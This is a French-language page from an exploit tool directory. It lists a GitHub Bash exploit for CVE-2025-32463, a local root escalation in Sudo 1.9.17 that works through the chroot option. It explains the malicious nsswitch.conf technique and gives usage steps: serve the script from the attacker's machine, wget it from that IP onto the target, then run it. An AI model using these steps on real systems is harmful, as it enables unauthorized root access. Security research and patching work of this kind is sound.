Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32463 — Script d'exploitation Bash pour CVE-2025-32463, une vulnérabilité d'élévation de privilèges locale dans Sudo 1.9.17 via l'option chroot, permettant d'obtenir un accès root sur les systèmes affectés. | Kitploit
Outils/GitHubGitHub/justjoeyking/cve-2025-32463
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Script d'exploitation Bash pour CVE-2025-32463, une vulnérabilité d'élévation de privilèges locale dans Sudo 1.9.17 via l'option chroot, permettant d'obtenir un accès root sur les systèmes affectés.

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Sudo version 1.9.17 a une vulnérabilité critique (CVE-2025-32463) qui permet à des utilisateurs locaux d'obtenir un accès root en exploitant l'option chroot, ce qui peut entraîner de graves risques de sécurité. Il est conseillé aux utilisateurs de mettre à jour vers la version 1.9.17p1 ou ultérieure pour atténuer ce problème.

Aperçu de la vulnérabilité de Sudo 1.9.17 :-

La vulnérabilité de Sudo version 1.9.17, identifiée comme CVE-2025-32463, est un défaut critique qui permet à des utilisateurs locaux d'obtenir un accès root. Ce problème provient d'un changement dans la façon dont Sudo gère l'option --chroot (-R), qui est conçue pour isoler les processus en changeant leur répertoire racine.

Comment fonctionne la vulnérabilité :-

Problème de résolution de chemin : Dans les versions 1.9.14 à 1.9.17, Sudo évalue l'option --chroot avant de vérifier les permissions utilisateur. Cela permet aux attaquants de contrôler l'environnement et de charger des bibliothèques malveillantes.

Étapes d'exploitation :

Un attaquant crée un fichier nsswitch.conf malveillant dans un répertoire qu'il contrôle. Il exécute Sudo avec l'option -R, forçant Sudo à charger la configuration et les bibliothèques de l'attaquant, ce qui accorde un accès root.

J'ai créé un script bash "cwoot.sh" qui, après exécution, élève directement les privilèges à root.

Faites ce qui suit :

Téléchargez le script depuis le dépôt : git clone https://github.com/justjoeyking/CVE-2025-32463.git

Sur votre machine : python3 -m http.server 8080

Sur la machine cible : wget http://<own_IP_address>:8080/cwoot.sh

Sur la machine cible : chmod 755 cwoot.sh

Exécutez le script sur la machine cible : ./cwoot.sh

Télécharger l’outil